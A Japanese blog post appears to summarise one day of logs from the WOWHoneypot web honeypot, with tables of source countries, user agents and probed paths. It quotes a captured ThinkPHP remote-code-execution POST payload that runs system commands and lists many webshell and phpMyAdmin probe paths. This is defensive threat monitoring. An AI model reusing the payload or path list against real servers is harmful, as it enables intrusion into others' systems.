ハニーポット観察日記(2019/02/14)
WOWHoneypot
ハニーポット「WOWHoneypot」で2019/02/14 (木) 00:00~23:59 UTC(運用42日目)に取得したログの簡易分析です。
特徴
- WebShellやphpMyAdminなどの探査を中心としたまとまったアクセスを3回観測しました。
- 2019/01/18以来、27日ぶりにThinkPHPの脆弱性を利用した攻撃を2件観測しました。
- 2019/01/30以来、15日ぶりにAdobe ColdFusionの探査を観測しました。
- 5日連続でZGrabによるスキャンを観測しました。
- 2019/02/05以来、9日ぶりにMASSCANによるスキャンを観測しました。
概況
- 集計期間 : 2019/02/14 (木) 00:00~23:59 UTC
- 総アクセス件数 : 752 件(前日比 +713 件)
- WebShellの探査 : 446 件
- phpMyAdminの探査 : 240 件
- Tomcatの管理ページに対するログイン試行 : 28 件
- トップページへのアクセス : 18 件
- Network Weathermapの探査 : 6 件
- Microsoft IIS 6.0の脆弱性(CVE-2017-7269)を利用した攻撃 : 3 件
- WebDAVの探査 : 3 件
- WordPress用のPortable phpMyAdminの脆弱性(CVE-2012-5469)を利用した攻撃 : 3 件
- Adobe ColdFusionの探査 : 2 件
- ThinkPHPの脆弱性を利用した攻撃(参照) : 2 件
- ThinkPHPの探査 : 1 件
- WordPressのコンフィグファイルの探査 : 1 件
- 不明 : 1 件
- ユニークIPアドレス件数 : 23 件 (前日比 +-0 件)
- アクセス元の国数 : 12 カ国 (前日比 -2 カ国)
国別のアクセス件数
国別のアクセス件数は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | China | 545 | - | 0 | +545 | - |
2. | Italy | 185 | 13. | 1 | +184 | - |
3. | United States | 6 | 3. | 4 | +2 | - |
4. | Brazil | 4 | 2. | 5 | -1 | - |
5. | France | 3 | - | 0 | +3 | - |
6. | Poland | 2 | - | 0 | +2 | - |
7. | Nigeria | 2 | - | 0 | +2 | - |
8. | South Africa | 1 | - | 0 | +1 | - |
9. | Japan | 1 | - | 0 | +1 | - |
10. | India | 1 | 4. | 2 | -1 | - |
11. | Cambodia | 1 | 12. | 1 | +-0 | - |
12. | Bangladesh | 1 | 6. | 1 | +-0 | - |
User-Agent
HTTPリクエストに含まれていたUser-Agentは以下の通りです。
順位 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | 238 | - | 0 | +238 | WebShellの探査でのみ使用 |
2. | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 | 126 | - | 0 | +126 | 主にWebShellやphpMyAdminの探査で使用 |
3. | Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 | 77 | - | 0 | +77 | 主にphpMyAdminの探査で使用 |
4. | Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 | 62 | - | 0 | +62 | WebShellの探査でのみ使用 |
5. | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 | 61 | - | 0 | +61 | 主にphpMyAdminの探査で使用 |
6. | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0) | 58 | - | 0 | +58 | WebShellの探査でのみ使用 |
7. | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 | 43 | - | 0 | +43 | WebShellやphpMyAdminなどの探査で使用 |
8. | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 | 29 | - | 0 | +29 | 主にWebShellやphpMyAdminの探査で使用 |
9. | Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 | 10 | - | 0 | +10 | Tomcatの管理ページに対するログイン試行でのみ使用 |
10. | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 | 9 | - | 0 | +9 | Tomcatの管理ページに対するログイン試行でのみ使用 |
11. | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0) | 9 | - | 0 | +9 | Tomcatの管理ページに対するログイン試行でのみ使用 |
12. | 未設定 | 5 | 7. | 1 | +4 | - |
13. | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 | 5 | - | 0 | +5 | - |
14. | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 | 4 | 3. | 4 | +-0 | - |
15. | Mozilla/5.0 | 3 | - | 0 | +3 | WebDAVの探査でのみ使用 |
16. | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) | 3 | - | 0 | +3 | 主にThinkPHPの探査や脆弱性を利用した攻撃で使用 |
17. | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 | 2 | 4. | 4 | -2 | - |
18. | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 | 2 | 2. | 7 | -5 | - |
19. | Mozilla/5.0 zgrab/0.x | 1 | 5. | 3 | -2 | ZGrabによるスキャン |
20. | Go-http-client/1.1 | 1 | - | 0 | +1 | ThinkPHPの脆弱性を利用した攻撃でのみ使用 |
21. | HTTP Banner Detection (https://security.ipip.net) | 1 | - | 0 | +1 | - |
22. | masscan/1.0 (https://github.com/robertdavidgraham/masscan) | 1 | - | 0 | +1 | MASSCANによるスキャン |
23. | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | 1 | - | 0 | +1 | - |
24. | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 | 1 | - | 0 | +1 | - |
アクセス先
- WebShellやphpMyAdminなどの探査を中心としたまとまったアクセスを3回観測しました。
- 2019/01/18以来、27日ぶりにThinkPHPの脆弱性を利用した攻撃を2件観測しました。
- うち1件がPOSTメソッドを利用した攻撃で、POSTリクエストを利用した攻撃を初めて観測しました。
- 2019/01/30以来、15日ぶりにAdobe ColdFusionの探査を観測しました。
- 5日連続でZGrabによるスキャンを観測しました。
- 件数は1件でした。
- User-Agentは
Mozilla/5.0 zgrab/0.x
でした。 - 送信元IPアドレスは、University of Michigan(AS36375)に登録されたものでした。
- 2019/02/05以来、9日ぶりにMASSCANによるスキャンを観測しました。
- 件数は1件でした。
- User-Agentは
masscan/1.0 (https://github.com/robertdavidgraham/masscan)
でした。 - 送信元IPアドレスは、DigitalOcean, LLC(AS14061)に登録されたものでした。
ThinkPHPの脆弱性を利用した攻撃
POSTメソッドを利用したThinkPHPの脆弱性を狙った攻撃を初めて観測しました。
unameコマンドとipconfigコマンドを実行しようとしていました。
POST /TP/public/index.php?s=captcha HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Go-http-client/1.1 Content-Length: 84 Connection: close Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
意図が不明なアクセス
1つのIPアドレスから、このパスだけにアクセスがありました。
これもWebShellの探査なのでしょうか。
GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Host: xxx.xxx.xxx.xxx Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive
アクセス先一覧
アクセス先の一覧は以下の通りです。
順位 | 備考 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 |
---|---|---|---|---|---|---|
1. | Tomcatの管理ページに対するログイン試行 | GET /manager/html HTTP/1.1 | 28 | - | 0 | +28 |
2. | トップページへのアクセス | GET / HTTP/1.1 | 16 | 1. | 21 | -5 |
3. | WebShellの探査 | POST /qq.php HTTP/1.1 | 10 | - | 0 | +10 |
4. | WebShellの探査 | GET /cmd.php HTTP/1.1 | 6 | - | 0 | +6 |
5. | WebShellの探査 | POST /xx.php HTTP/1.1 | 6 | - | 0 | +6 |
6. | phpMyAdminの探査 | GET /PMA/index.php HTTP/1.1 | 6 | - | 0 | +6 |
7. | phpMyAdminの探査 | GET /web/phpMyAdmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
8. | phpMyAdminの探査 | GET /admin/pma/index.php HTTP/1.1 | 6 | - | 0 | +6 |
9. | phpMyAdminの探査 | GET /xampp/phpmyadmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
10. | phpMyAdminの探査 | GET /tools/phpMyAdmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
11. | phpMyAdminの探査 | GET /MyAdmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
12. | WebShellの探査 | GET /shell.php HTTP/1.1 | 5 | - | 0 | +5 |
13. | WebShellの探査 | POST /conflg.php HTTP/1.1 | 5 | - | 0 | +5 |
14. | WebShellの探査 | POST /q.php HTTP/1.1 | 5 | - | 0 | +5 |
15. | WebShellの探査 | POST /1.php HTTP/1.1 | 5 | - | 0 | +5 |
16. | phpMyAdminの探査 | GET /admin/PMA/index.php HTTP/1.1 | 5 | - | 0 | +5 |
17. | phpMyAdminの探査 | GET /www/phpMyAdmin/index.php HTTP/1.1 | 5 | - | 0 | +5 |
18. | phpMyAdminの探査 | GET /typo3/phpmyadmin/index.php HTTP/1.1 | 5 | - | 0 | +5 |
19. | phpMyAdminの探査 | GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1 | 5 | - | 0 | +5 |
20. | WebShellの探査 | POST /test.php HTTP/1.1 | 4 | - | 0 | +4 |
21. | WebShellの探査 | POST /confg.php HTTP/1.1 | 4 | - | 0 | +4 |
22. | WebShellの探査 | POST /x.php HTTP/1.1 | 4 | - | 0 | +4 |
23. | phpMyAdminの探査 | GET /pma/index.php HTTP/1.1 | 4 | - | 0 | +4 |
24. | phpMyAdminの探査 | GET /admin/phpmyadmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
25. | phpMyAdminの探査 | GET /admin/phpMyAdmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
26. | phpMyAdminの探査 | GET /claroline/phpMyAdmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
27. | phpMyAdminの探査 | GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
28. | Microsoft IIS 6.0の脆弱性(CVE-2017-7269)を利用した攻撃 | PROPFIND / HTTP/1.1 | 3 | - | 0 | +3 |
29. | WebDAVの探査 | GET /webdav/ HTTP/1.1 | 3 | - | 0 | +3 |
30. | WebShellの探査 | GET /java.php HTTP/1.1 | 3 | - | 0 | +3 |
31. | WebShellの探査 | GET /_query.php HTTP/1.1 | 3 | - | 0 | +3 |
32. | WebShellの探査 | GET /test.php HTTP/1.1 | 3 | - | 0 | +3 |
33. | WebShellの探査 | GET /db_cts.php HTTP/1.1 | 3 | - | 0 | +3 |
34. | WebShellの探査 | GET /logon.php HTTP/1.1 | 3 | - | 0 | +3 |
35. | WebShellの探査 | GET /license.php HTTP/1.1 | 3 | - | 0 | +3 |
36. | WebShellの探査 | GET /log.php HTTP/1.1 | 3 | - | 0 | +3 |
37. | WebShellの探査 | GET /hell.php HTTP/1.1 | 3 | - | 0 | +3 |
38. | WebShellの探査 | GET /pmd_online.php HTTP/1.1 | 3 | - | 0 | +3 |
39. | WebShellの探査 | GET /x.php HTTP/1.1 | 3 | - | 0 | +3 |
40. | WebShellの探査 | GET /htdocs.php HTTP/1.1 | 3 | - | 0 | +3 |
41. | WebShellの探査 | GET /desktop.ini.php HTTP/1.1 | 3 | - | 0 | +3 |
42. | WebShellの探査 | GET /cmdd.php HTTP/1.1 | 3 | - | 0 | +3 |
43. | WebShellの探査 | GET /knal.php HTTP/1.1 | 3 | - | 0 | +3 |
44. | WebShellの探査 | GET /appserv.php HTTP/1.1 | 3 | - | 0 | +3 |
45. | phpMyAdminの探査 | GET /scripts/setup.php HTTP/1.1 | 3 | - | 0 | +3 |
46. | phpMyAdminの探査 | GET /phpMyAdmin/scripts/setup.php HTTP/1.1 | 3 | - | 0 | +3 |
47. | phpMyAdminの探査 | GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1 | 3 | - | 0 | +3 |
48. | Network Weathermapの探査 | GET /plugins/weathermap/editor.php HTTP/1.1 | 3 | - | 0 | +3 |
49. | Network Weathermapの探査 | GET /cacti/plugins/weathermap/editor.php HTTP/1.1 | 3 | - | 0 | +3 |
50. | WebShellの探査 | POST /s.php HTTP/1.1 | 3 | - | 0 | +3 |
51. | WebShellの探査 | POST /w.php HTTP/1.1 | 3 | - | 0 | +3 |
52. | WebShellの探査 | POST /sheep.php HTTP/1.1 | 3 | - | 0 | +3 |
53. | WebShellの探査 | POST /qaq.php HTTP/1.1 | 3 | - | 0 | +3 |
54. | WebShellの探査 | POST /db_session.init.php HTTP/1.1 | 3 | - | 0 | +3 |
55. | WebShellの探査 | POST /db__.init.php HTTP/1.1 | 3 | - | 0 | +3 |
56. | WebShellの探査 | POST /m.php?pbid=open HTTP/1.1 | 3 | - | 0 | +3 |
57. | WebShellの探査 | POST /db_dataml.php HTTP/1.1 | 3 | - | 0 | +3 |
58. | WebShellの探査 | POST /db_desql.php HTTP/1.1 | 3 | - | 0 | +3 |
59. | WebShellの探査 | POST /wshell.php HTTP/1.1 | 3 | - | 0 | +3 |
60. | WebShellの探査 | POST /xshell.php HTTP/1.1 | 3 | - | 0 | +3 |
61. | WebShellの探査 | POST /lindex.php HTTP/1.1 | 3 | - | 0 | +3 |
62. | WebShellの探査 | POST /phpstudy.php HTTP/1.1 | 3 | - | 0 | +3 |
63. | WebShellの探査 | POST /phpStudy.php HTTP/1.1 | 3 | - | 0 | +3 |
64. | WebShellの探査 | POST /weixiao.php HTTP/1.1 | 3 | - | 0 | +3 |
65. | WebShellの探査 | POST /feixiang.php HTTP/1.1 | 3 | - | 0 | +3 |
66. | WebShellの探査 | POST /ak48.php HTTP/1.1 | 3 | - | 0 | +3 |
67. | WebShellの探査 | POST /xiao.php HTTP/1.1 | 3 | - | 0 | +3 |
68. | WebShellの探査 | POST /defect.php HTTP/1.1 | 3 | - | 0 | +3 |
69. | WebShellの探査 | POST /webslee.php HTTP/1.1 | 3 | - | 0 | +3 |
70. | WebShellの探査 | POST /pe.php HTTP/1.1 | 3 | - | 0 | +3 |
71. | WebShellの探査 | POST /hm.php HTTP/1.1 | 3 | - | 0 | +3 |
72. | WebShellの探査 | POST /cainiao.php HTTP/1.1 | 3 | - | 0 | +3 |
73. | WebShellの探査 | POST /zuoshou.php HTTP/1.1 | 3 | - | 0 | +3 |
74. | WebShellの探査 | POST /zuo.php HTTP/1.1 | 3 | - | 0 | +3 |
75. | WebShellの探査 | POST /aotu.php HTTP/1.1 | 3 | - | 0 | +3 |
76. | WebShellの探査 | POST /aotu7.php HTTP/1.1 | 3 | - | 0 | +3 |
77. | WebShellの探査 | POST /cmd.php HTTP/1.1 | 3 | - | 0 | +3 |
78. | WebShellの探査 | POST /system.php HTTP/1.1 | 3 | - | 0 | +3 |
79. | WebShellの探査 | POST /l6.php HTTP/1.1 | 3 | - | 0 | +3 |
80. | WebShellの探査 | POST /l8.php HTTP/1.1 | 3 | - | 0 | +3 |
81. | WebShellの探査 | POST /56.php HTTP/1.1 | 3 | - | 0 | +3 |
82. | WebShellの探査 | POST /mz.php HTTP/1.1 | 3 | - | 0 | +3 |
83. | WebShellの探査 | POST /yumo.php HTTP/1.1 | 3 | - | 0 | +3 |
84. | WebShellの探査 | POST /min.php HTTP/1.1 | 3 | - | 0 | +3 |
85. | WebShellの探査 | POST /wan.php HTTP/1.1 | 3 | - | 0 | +3 |
86. | WebShellの探査 | POST /wanan.php HTTP/1.1 | 3 | - | 0 | +3 |
87. | WebShellの探査 | POST /ssaa.php HTTP/1.1 | 3 | - | 0 | +3 |
88. | WebShellの探査 | POST /12.php HTTP/1.1 | 3 | - | 0 | +3 |
89. | WebShellの探査 | POST /hh.php HTTP/1.1 | 3 | - | 0 | +3 |
90. | WebShellの探査 | POST /ak.php HTTP/1.1 | 3 | - | 0 | +3 |
91. | WebShellの探査 | POST /ip.php HTTP/1.1 | 3 | - | 0 | +3 |
92. | WebShellの探査 | POST /infoo.php HTTP/1.1 | 3 | - | 0 | +3 |
93. | WebShellの探査 | POST /qwe.php HTTP/1.1 | 3 | - | 0 | +3 |
94. | phpMyAdminの探査 | GET /phpmyadmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
95. | phpMyAdminの探査 | GET /PMA2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
96. | phpMyAdminの探査 | GET /pmamy2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
97. | phpMyAdminの探査 | GET /mysql/index.php HTTP/1.1 | 3 | - | 0 | +3 |
98. | phpMyAdminの探査 | GET /admin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
99. | phpMyAdminの探査 | GET /admin/mysql/index.php HTTP/1.1 | 3 | - | 0 | +3 |
100. | phpMyAdminの探査 | GET /admin/mysql2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
101. | phpMyAdminの探査 | GET /admin/phpmyadmin2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
102. | phpMyAdminの探査 | GET /mysqladmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
103. | phpMyAdminの探査 | GET /mysql_admin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
104. | phpMyAdminの探査 | GET /phpadmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
105. | phpMyAdminの探査 | GET /phpAdmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
106. | phpMyAdminの探査 | GET /phpmyadmin0/index.php HTTP/1.1 | 3 | - | 0 | +3 |
107. | phpMyAdminの探査 | GET /phpMyAdmin-4.4.0/index.php HTTP/1.1 | 3 | - | 0 | +3 |
108. | phpMyAdminの探査 | GET /phpMyadmin_bak/index.php HTTP/1.1 | 3 | - | 0 | +3 |
109. | phpMyAdminの探査 | GET /phpmyadmin-old/index.php HTTP/1.1 | 3 | - | 0 | +3 |
110. | phpMyAdminの探査 | GET /phpMyAdminold/index.php HTTP/1.1 | 3 | - | 0 | +3 |
111. | phpMyAdminの探査 | GET /phpMyAdmin.old/index.php HTTP/1.1 | 3 | - | 0 | +3 |
112. | phpMyAdminの探査 | GET /pma-old/index.php HTTP/1.1 | 3 | - | 0 | +3 |
113. | phpMyAdminの探査 | GET /phpma/index.php HTTP/1.1 | 3 | - | 0 | +3 |
114. | phpMyAdminの探査 | GET /phpMyAbmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
115. | phpMyAdminの探査 | GET /phpMyAdmin__/index.php HTTP/1.1 | 3 | - | 0 | +3 |
116. | phpMyAdminの探査 | GET /phpMyAdmin+++---/index.php HTTP/1.1 | 3 | - | 0 | +3 |
117. | phpMyAdminの探査 | GET /phpmyadm1n/index.php HTTP/1.1 | 3 | - | 0 | +3 |
118. | phpMyAdminの探査 | GET /phpMyAdm1n/index.php HTTP/1.1 | 3 | - | 0 | +3 |
119. | phpMyAdminの探査 | GET /shaAdmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
120. | phpMyAdminの探査 | GET /phpMyadmi/index.php HTTP/1.1 | 3 | - | 0 | +3 |
121. | phpMyAdminの探査 | GET /phpMyAdmion/index.php HTTP/1.1 | 3 | - | 0 | +3 |
122. | phpMyAdminの探査 | GET /phpMyAdmin1/index.php HTTP/1.1 | 3 | - | 0 | +3 |
123. | phpMyAdminの探査 | GET /phpMyAdmin123/index.php HTTP/1.1 | 3 | - | 0 | +3 |
124. | phpMyAdminの探査 | GET /pwd/index.php HTTP/1.1 | 3 | - | 0 | +3 |
125. | phpMyAdminの探査 | GET /phpMyAdmina/index.php HTTP/1.1 | 3 | - | 0 | +3 |
126. | phpMyAdminの探査 | GET /phpMydmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
127. | phpMyAdminの探査 | GET /program/index.php HTTP/1.1 | 3 | - | 0 | +3 |
128. | phpMyAdminの探査 | GET /shopdb/index.php HTTP/1.1 | 3 | - | 0 | +3 |
129. | phpMyAdminの探査 | GET /phppma/index.php HTTP/1.1 | 3 | - | 0 | +3 |
130. | phpMyAdminの探査 | GET /phpmy/index.php HTTP/1.1 | 3 | - | 0 | +3 |
131. | phpMyAdminの探査 | GET /mysql/admin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
132. | phpMyAdminの探査 | GET /mysql/dbadmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
133. | phpMyAdminの探査 | GET /mysql/mysqlmanager/index.php HTTP/1.1 | 3 | - | 0 | +3 |
134. | WordPress用のPortable phpMyAdminの脆弱性(CVE-2012-5469)を利用した攻撃 | GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1 | 3 | - | 0 | +3 |
135. | WebShellの探査 | GET /help.php HTTP/1.1 | 2 | - | 0 | +2 |
136. | phpMyAdminの探査 | GET /db_pma.php HTTP/1.1 | 2 | - | 0 | +2 |
137. | WebShellの探査 | GET /help-e.php HTTP/1.1 | 2 | - | 0 | +2 |
138. | WebShellの探査 | GET /z.php HTTP/1.1 | 2 | - | 0 | +2 |
139. | WebShellの探査 | GET /lala.php HTTP/1.1 | 2 | - | 0 | +2 |
140. | WebShellの探査 | GET /lala-dpr.php HTTP/1.1 | 2 | - | 0 | +2 |
141. | WebShellの探査 | GET /wpc.php HTTP/1.1 | 2 | - | 0 | +2 |
142. | WebShellの探査 | GET /wpo.php HTTP/1.1 | 2 | - | 0 | +2 |
143. | WebShellの探査 | GET /text.php HTTP/1.1 | 2 | - | 0 | +2 |
144. | WebShellの探査 | GET /muhstik.php HTTP/1.1 | 2 | - | 0 | +2 |
145. | WebShellの探査 | GET /muhstik2.php HTTP/1.1 | 2 | - | 0 | +2 |
146. | WebShellの探査 | GET /muhstiks.php HTTP/1.1 | 2 | - | 0 | +2 |
147. | WebShellの探査 | GET /muhstik-dpr.php HTTP/1.1 | 2 | - | 0 | +2 |
148. | WebShellの探査 | GET /lol.php HTTP/1.1 | 2 | - | 0 | +2 |
149. | WebShellの探査 | GET /uploader.php HTTP/1.1 | 2 | - | 0 | +2 |
150. | WebShellの探査 | GET /cmv.php HTTP/1.1 | 2 | - | 0 | +2 |
151. | phpMyAdminの探査 | GET /phpmyadmin/scripts/setup.php HTTP/1.1 | 2 | - | 0 | +2 |
152. | phpMyAdminの探査 | GET /phpmyadmin/scripts/db___.init.php HTTP/1.1 | 2 | - | 0 | +2 |
153. | WebShellの探査 | POST /wuwu11.php HTTP/1.1 | 2 | - | 0 | +2 |
154. | WebShellの探査 | POST /xw.php HTTP/1.1 | 2 | - | 0 | +2 |
155. | WebShellの探査 | POST /xw1.php HTTP/1.1 | 2 | - | 0 | +2 |
156. | WebShellの探査 | POST /9678.php HTTP/1.1 | 2 | - | 0 | +2 |
157. | WebShellの探査 | POST /wc.php HTTP/1.1 | 2 | - | 0 | +2 |
158. | WebShellの探査 | POST /db.init.php HTTP/1.1 | 2 | - | 0 | +2 |
159. | WebShellの探査 | POST /wp-admins.php HTTP/1.1 | 2 | - | 0 | +2 |
160. | WebShellの探査 | POST /mx.php HTTP/1.1 | 2 | - | 0 | +2 |
161. | WebShellの探査 | POST /ak47.php HTTP/1.1 | 2 | - | 0 | +2 |
162. | WebShellの探査 | POST /yao.php HTTP/1.1 | 2 | - | 0 | +2 |
163. | WebShellの探査 | POST /bak.php HTTP/1.1 | 2 | - | 0 | +2 |
164. | WebShellの探査 | POST /l7.php HTTP/1.1 | 2 | - | 0 | +2 |
165. | WebShellの探査 | POST /aw.php HTTP/1.1 | 2 | - | 0 | +2 |
166. | WebShellの探査 | POST /1213.php HTTP/1.1 | 2 | - | 0 | +2 |
167. | WebShellの探査 | POST /post.php HTTP/1.1 | 2 | - | 0 | +2 |
168. | WebShellの探査 | POST /aaaa.php HTTP/1.1 | 2 | - | 0 | +2 |
169. | WebShellの探査 | POST /h1.php HTTP/1.1 | 2 | - | 0 | +2 |
170. | WebShellの探査 | POST /2.php HTTP/1.1 | 2 | - | 0 | +2 |
171. | WebShellの探査 | POST /z.php HTTP/1.1 | 2 | - | 0 | +2 |
172. | WebShellの探査 | POST /api.php HTTP/1.1 | 2 | - | 0 | +2 |
173. | WebShellの探査 | POST /hello.php HTTP/1.1 | 2 | - | 0 | +2 |
174. | WebShellの探査 | POST /lucky.php HTTP/1.1 | 2 | - | 0 | +2 |
175. | WebShellの探査 | POST /MCLi.php HTTP/1.1 | 2 | - | 0 | +2 |
176. | WebShellの探査 | POST /zxc1.php HTTP/1.1 | 2 | - | 0 | +2 |
177. | WebShellの探査 | POST /test123.php HTTP/1.1 | 2 | - | 0 | +2 |
178. | WebShellの探査 | POST /paylog.php HTTP/1.1 | 2 | - | 0 | +2 |
179. | phpMyAdminの探査 | GET /index.php HTTP/1.1 | 2 | - | 0 | +2 |
180. | phpMyAdminの探査 | GET /phpMyAdmin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
181. | phpMyAdminの探査 | GET /pmd/index.php HTTP/1.1 | 2 | - | 0 | +2 |
182. | phpMyAdminの探査 | GET /pmamy/index.php HTTP/1.1 | 2 | - | 0 | +2 |
183. | phpMyAdminの探査 | GET /db/index.php HTTP/1.1 | 2 | - | 0 | +2 |
184. | phpMyAdminの探査 | GET /dbadmin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
185. | phpMyAdminの探査 | GET /mysql-admin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
186. | phpMyAdminの探査 | GET /phpmyadmin1/index.php HTTP/1.1 | 2 | - | 0 | +2 |
187. | phpMyAdminの探査 | GET /phpmyadmin2/index.php HTTP/1.1 | 2 | - | 0 | +2 |
188. | phpMyAdminの探査 | GET /myadmin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
189. | phpMyAdminの探査 | GET /myadmin2/index.php HTTP/1.1 | 2 | - | 0 | +2 |
190. | phpMyAdminの探査 | GET /v/index.php HTTP/1.1 | 2 | - | 0 | +2 |
191. | WebShellの探査 | GET /cmx.php HTTP/1.1 | 2 | - | 0 | +2 |
192. | トップページへのアクセス | GET / HTTP/1.0 | 2 | - | 0 | +2 |
193. | Adobe ColdFusionの探査 | GET /CFIDE/administrator/ HTTP/1.1 | 2 | - | 0 | +2 |
194. | WordPressのコンフィグファイルの探査 | GET /wp-config.php HTTP/1.1 | 1 | - | 0 | +1 |
195. | WebShellの探査 | POST /3.php HTTP/1.1 | 1 | - | 0 | +1 |
196. | WebShellの探査 | POST /phpinfi.php HTTP/1.1 | 1 | - | 0 | +1 |
197. | WebShellの探査 | POST /9510.php HTTP/1.1 | 1 | - | 0 | +1 |
198. | WebShellの探査 | POST /python.php HTTP/1.1 | 1 | - | 0 | +1 |
199. | WebShellの探査 | POST /default.php HTTP/1.1 | 1 | - | 0 | +1 |
200. | WebShellの探査 | POST /sean.php HTTP/1.1 | 1 | - | 0 | +1 |
201. | WebShellの探査 | POST /app.php HTTP/1.1 | 1 | - | 0 | +1 |
202. | WebShellの探査 | POST /help.php HTTP/1.1 | 1 | - | 0 | +1 |
203. | WebShellの探査 | POST /tiandi.php HTTP/1.1 | 1 | - | 0 | +1 |
204. | WebShellの探査 | POST /miao.php HTTP/1.1 | 1 | - | 0 | +1 |
205. | WebShellの探査 | POST /xz.php HTTP/1.1 | 1 | - | 0 | +1 |
206. | WebShellの探査 | POST /linuxse.php HTTP/1.1 | 1 | - | 0 | +1 |
207. | WebShellの探査 | POST /zuoindex.php HTTP/1.1 | 1 | - | 0 | +1 |
208. | WebShellの探査 | POST /zshmindex.php HTTP/1.1 | 1 | - | 0 | +1 |
209. | WebShellの探査 | POST /tomcat.php HTTP/1.1 | 1 | - | 0 | +1 |
210. | WebShellの探査 | POST /ceshi.php HTTP/1.1 | 1 | - | 0 | +1 |
211. | WebShellの探査 | POST /1hou.php HTTP/1.1 | 1 | - | 0 | +1 |
212. | WebShellの探査 | POST /ou2.php HTTP/1.1 | 1 | - | 0 | +1 |
213. | WebShellの探査 | POST /zuos.php HTTP/1.1 | 1 | - | 0 | +1 |
214. | WebShellの探査 | POST /zuoss.php HTTP/1.1 | 1 | - | 0 | +1 |
215. | WebShellの探査 | POST /zuoshss.php HTTP/1.1 | 1 | - | 0 | +1 |
216. | WebShellの探査 | POST /boots.php HTTP/1.1 | 1 | - | 0 | +1 |
217. | WebShellの探査 | POST /she.php HTTP/1.1 | 1 | - | 0 | +1 |
218. | WebShellの探査 | POST /qw.php HTTP/1.1 | 1 | - | 0 | +1 |
219. | WebShellの探査 | POST /caonma.php HTTP/1.1 | 1 | - | 0 | +1 |
220. | WebShellの探査 | POST /wcp.php HTTP/1.1 | 1 | - | 0 | +1 |
221. | WebShellの探査 | POST /u.php HTTP/1.1 | 1 | - | 0 | +1 |
222. | WebShellの探査 | POST /uuu.php HTTP/1.1 | 1 | - | 0 | +1 |
223. | WebShellの探査 | POST /sss.php HTTP/1.1 | 1 | - | 0 | +1 |
224. | WebShellの探査 | POST /core.php HTTP/1.1 | 1 | - | 0 | +1 |
